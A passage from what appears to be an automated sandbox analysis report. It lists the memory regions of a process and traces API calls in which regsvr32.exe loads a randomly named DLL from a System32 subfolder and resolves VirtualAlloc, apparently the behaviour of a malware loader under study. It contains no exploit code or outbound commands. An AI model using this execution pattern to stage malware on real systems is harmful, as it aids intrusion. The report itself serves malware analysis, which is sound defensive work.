= 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 881 start_va = 0x1dc0000 end_va = 0x1dc9fff monitored = 0 entry_point = 0x1dc15c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 882 start_va = 0x22e0000 end_va = 0x22e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 883 start_va = 0x1dc0000 end_va = 0x1dc9fff monitored = 0 entry_point = 0x1dc15c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 884 start_va = 0x22e0000 end_va = 0x22e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 885 start_va = 0x1dc0000 end_va = 0x1dc9fff monitored = 0 entry_point = 0x1dc15c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 886 start_va = 0x22e0000 end_va = 0x22e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 887 start_va = 0x7ffe93b50000 end_va = 0x7ffe93bc9fff monitored = 0 entry_point = 0x7ffe93b71a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 888 start_va = 0x1dc0000 end_va = 0x1dc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001dc0000" filename = "" Region: id = 889 start_va = 0x7ffe84dc0000 end_va = 0x7ffe84dd3fff monitored = 0 entry_point = 0x7ffe84dc3710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 890 start_va = 0x7ffe94170000 end_va = 0x7ffe94196fff monitored = 0 entry_point = 0x7ffe94180aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 891 start_va = 0x7ffe94130000 end_va = 0x7ffe94169fff monitored = 0 entry_point = 0x7ffe94138d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 892 start_va = 0x22e0000 end_va = 0x22e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 893 start_va = 0x7ffe93c50000 end_va = 0x7ffe93c59fff monitored = 0 entry_point = 0x7ffe93c51830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 894 start_va = 0x7ffe95160000 end_va = 0x7ffe951b4fff monitored = 0 entry_point = 0x7ffe95177970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 895 start_va = 0x7ffe93f80000 end_va = 0x7ffe93f96fff monitored = 0 entry_point = 0x7ffe93f879d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 896 start_va = 0x7ffe93c10000 end_va = 0x7ffe93c43fff monitored = 0 entry_point = 0x7ffe93c2ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 897 start_va = 0x7ffe940a0000 end_va = 0x7ffe940aafff monitored = 0 entry_point = 0x7ffe940a19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 898 start_va = 0x22e0000 end_va = 0x235ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 899 start_va = 0x2360000 end_va = 0x245ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 900 start_va = 0x2460000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002460000" filename = "" Region: id = 901 start_va = 0x7ffe93600000 end_va = 0x7ffe93623fff monitored = 0 entry_point = 0x7ffe93603260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 902 start_va = 0x1dc0000 end_va = 0x1dc9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 903 start_va = 0x7ffe8dc80000 end_va = 0x7ffe8dcaefff monitored = 0 entry_point = 0x7ffe8dc8ec60 region_type = mapped_file name = "cryptnet.dll" filename = "\\Windows\\System32\\cryptnet.dll" (normalized: "c:\\windows\\system32\\cryptnet.dll") Region: id = 904 start_va = 0x2660000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002660000" filename = "" Region: id = 905 start_va = 0x7ffe8d330000 end_va = 0x7ffe8d345fff monitored = 0 entry_point = 0x7ffe8d3319f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 906 start_va = 0x7ffe8d310000 end_va = 0x7ffe8d329fff monitored = 0 entry_point = 0x7ffe8d312430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 907 start_va = 0x7ffe86f60000 end_va = 0x7ffe86fdffff monitored = 0 entry_point = 0x7ffe86f8d280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 908 start_va = 0x26e0000 end_va = 0x26e4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 909 start_va = 0x26f0000 end_va = 0x26fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 910 start_va = 0x7ffe8cf00000 end_va = 0x7ffe8cf66fff monitored = 0 entry_point = 0x7ffe8cf063e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 911 start_va = 0x7ffe8c510000 end_va = 0x7ffe8c519fff monitored = 0 entry_point = 0x7ffe8c5114c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 912 start_va = 0x2700000 end_va = 0x277ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 913 start_va = 0x7ffe90ec0000 end_va = 0x7ffe90ee8fff monitored = 0 entry_point = 0x7ffe90ecca00 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 914 start_va = 0x2780000 end_va = 0x2b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002780000" filename = "" Region: id = 915 start_va = 0x7ffe84e70000 end_va = 0x7ffe84e8dfff monitored = 0 entry_point = 0x7ffe84e7ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 916 start_va = 0x2660000 end_va = 0x2682fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002660000" filename = "" Region: id = 917 start_va = 0x2b80000 end_va = 0x2bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b80000" filename = "" Region: id = 918 start_va = 0x2690000 end_va = 0x269ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002690000" filename = "" Region: id = 919 start_va = 0x2690000 end_va = 0x26abfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002690000" filename = "" Region: id = 920 start_va = 0x26b0000 end_va = 0x26befff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026b0000" filename = "" Region: id = 921 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 922 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 923 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 924 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 925 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 926 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 927 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 928 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 929 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 930 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 931 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 932 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 933 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 934 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 935 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 936 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 937 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 938 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 939 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 940 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 941 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 942 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 943 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 944 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 945 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 946 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 947 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 948 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 949 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 950 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 951 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 952 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 953 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 954 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 955 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 956 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 957 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 958 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 959 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 960 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 961 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 962 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 963 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 964 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 965 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 966 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 967 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 968 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 969 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 970 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 971 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 972 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 973 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 974 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 975 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 976 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 977 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 978 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 979 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 980 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 981 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 982 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 983 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 984 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 985 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 986 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 987 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 988 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 989 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 990 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 991 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 992 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 993 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 994 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 995 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 996 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 997 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 998 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 999 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 1000 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 1001 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 1002 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 1003 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 1004 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 1005 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 1006 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 1007 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 1008 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 1009 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 1010 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 1011 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 1012 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 1013 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 1014 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 1015 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 1016 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 1017 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 1018 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 1019 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 1020 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 1021 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 1022 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 1023 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 1024 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 1025 start_va = 0x2690000 end_va = 0x269efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 1338 start_va = 0x2690000 end_va = 0x269ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002690000" filename = "" Region: id = 1339 start_va = 0x26a0000 end_va = 0x26a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 1340 start_va = 0x26b0000 end_va = 0x26b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Thread: id = 14 os_tid = 0xb64 [0094.662] GetStartupInfoW (in: lpStartupInfo=0xcfed0 | out: lpStartupInfo=0xcfed0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\regsvr32.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x7ff703d32819, hStdError=0x0)) [0094.662] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff703d30000 [0094.662] __set_app_type (_Type=0x2) [0094.662] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff703d32b20) returned 0x0 [0094.662] __wgetmainargs (in: _Argc=0x7ff703d350e8, _Argv=0x7ff703d350f0, _Env=0x7ff703d350f8, _DoWildCard=0, _StartInfo=0x7ff703d35104 | out: _Argc=0x7ff703d350e8, _Argv=0x7ff703d350f0, _Env=0x7ff703d350f8) returned 0 [0094.663] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0094.663] lstrlenW (lpString="C:\\Windows\\system32\\GnynPsiyLKdYjn\\GQeyw.dll") returned 44 [0094.663] OleInitialize (pvReserved=0x0) returned 0x0 [0094.740] _wsplitpath_s (in: _FullPath="C:\\Windows\\system32\\GnynPsiyLKdYjn\\GQeyw.dll", _Drive=0x0, _DriveCount=0x0, _Dir=0x0, _DirCount=0x0, _Filename=0x0, _FilenameCount=0x0, _Ext=0xce760, _ExtCount=0x100 | out: _Drive=0x0, _Dir=0x0, _Filename=0x0, _Ext=".dll") returned 0x0 [0094.740] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".dll", ulOptions=0x0, samDesired=0x1, phkResult=0xce538 | out: phkResult=0xce538*=0x13e) returned 0x0 [0094.740] RegQueryValueExW (in: hKey=0x13e, lpValueName=0x0, lpReserved=0x0, lpType=0x0, lpData=0xce550, lpcbData=0xce530*=0x200 | out: lpType=0x0, lpData=0xce550*=0x64, lpcbData=0xce530*=0x10) returned 0x0 [0094.740] RegCloseKey (hKey=0x13e) returned 0x0 [0094.740] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="dllfile", ulOptions=0x0, samDesired=0x1, phkResult=0xce538 | out: phkResult=0xce538*=0x13e) returned 0x0 [0094.740] RegOpenKeyExW (in: hKey=0x13e, lpSubKey="AutoRegister", ulOptions=0x0, samDesired=0x1, phkResult=0xce540 | out: phkResult=0xce540*=0x0) returned 0x2 [0094.740] RegCloseKey (hKey=0x13e) returned 0x0 [0094.740] SetErrorMode (uMode=0x1) returned 0x0 [0094.740] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\GnynPsiyLKdYjn\\GQeyw.dll", hFile=0x0, dwFlags=0x8) returned 0x1d20000 [0096.918] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="kernel32.dll", BaseAddress=0xcd5a0 | out: BaseAddress=0xcd5a0*=0x7ffe954a0000) returned 0x0 [0096.918] LdrGetProcedureAddress (in: BaseAddress=0x7ffe954a0000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0xcd670 | out: ProcedureAddress=0xcd670*=0x7ffe954c28c0) returned 0x0 [0096.919] LdrGetProcedureAddress 